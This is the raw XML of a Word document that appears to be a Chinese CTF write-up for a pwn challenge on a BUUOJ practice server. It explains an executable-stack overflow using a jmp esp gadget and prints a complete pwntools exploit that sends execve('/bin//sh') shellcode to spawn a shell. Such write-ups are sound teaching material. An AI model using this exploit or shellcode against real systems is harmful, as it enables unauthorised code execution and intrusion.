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2E2C1" w14:textId="2D99514C" w:rsidR="0000284D" w:rsidRDefault="0000284D" w:rsidP="0000284D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下主函数</w:t>
      </w:r>
      <w:r w:rsidRPr="0000284D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123A1A15" wp14:editId="28564467">
            <wp:extent cx="5274310" cy="2637155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="911490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90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84D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0000284D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61FE8A69" wp14:editId="2D1D3DCB">
            <wp:extent cx="5274310" cy="1664335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1876359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59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7D04" w14:textId="78CCEEC1" w:rsidR="0000284D" w:rsidRDefault="0000284D" w:rsidP="0000284D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>每次运行的地址都不一样，虽然stdout在bss段但是不能直接写执行，我们的策略是先写进去然后再用hint来调用，还是用汇编代码写的</w:t>
      </w:r>
      <w:r w:rsidRPr="0000284D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60D824DE" wp14:editId="179E8974">
            <wp:extent cx="5274310" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="294572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72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这里的esp增加了0x28，离ebp40个字节，我们需要剪掉40个字节因为我们要调用我们写的bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F586C0" w14:textId="172FC9BD" w:rsidR="0000284D" w:rsidRDefault="0000284D" w:rsidP="0000284D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>看一下wp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437BE99D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from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BDFE4F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p = remote('node5.buuoj.cn',26767)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1E11C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ret_addr = 0x08048554 #jmp esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B5C2CB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shellcode ='''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FEB47E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xor eax,eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315F424E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lastRenderedPageBreak/>
        <w:t>xor edx,edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7F7FD5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push edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C57CB85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push 0x68732f2f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F278F8B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push 0x6e69622f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBACCCC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mov ebx,esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384F66FB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xor ecx,ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592E7FDA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mov al,0xb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EBB1C6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int 0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580FE221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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7462E6B9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shellcode=asm(shellcode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113A4624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payload = shellcode.ljust(0x24,b'a') + p32(ret_addr) + asm("sub esp,40;call esp")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A17B2B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print(len(payload))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FEDAEA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#gdb.attach(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202128FD" w14:textId="77777777" w:rsidR="00A03B3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p.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6965CA42" w14:textId="332E2D8E" w:rsidR="0000284D" w:rsidRDefault="00A03B3D" w:rsidP="00A03B3D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p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000028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336A5" w14:textId="77777777" w:rsidR="00AF15C4" w:rsidRDefault="00AF15C4" w:rsidP="0000284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FD6062" w14:textId="77777777" w:rsidR="00AF15C4" w:rsidRDefault="00AF15C4" w:rsidP="0000284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DB466" w14:textId="77777777" w:rsidR="00AF15C4" w:rsidRDefault="00AF15C4" w:rsidP="0000284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FC44E8" w14:textId="77777777" w:rsidR="00AF15C4" w:rsidRDefault="00AF15C4" w:rsidP="0000284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1F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8016521A"/>
    <w:lvl w:ilvl="0" w:tplc="D742B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B616F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FDA2D36"/>
    <w:lvl w:ilvl="0" w:tplc="9F6A2F4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6579255">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="291442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1E3"/>
    <w:rsid w:val="0000284D"/>
    <w:rsid w:val="00112F07"/>
    <w:rsid w:val="001B41E3"/>
    <w:rsid w:val="00A03B3D"/>
    <w:rsid w:val="00AF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33058"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EA2A541A-C44F-48D4-BCE6-88AD4D3A9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41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1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1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1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1E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1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1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1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41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4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4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41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41E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41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41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41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41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41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4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1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41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41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41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41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4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41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41E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028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028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028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028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244</Words>
  <Characters>282</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>31</Lines>
  <Paragraphs>10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471826169@qq.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>471826169@qq.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-21T12:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-21T12:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>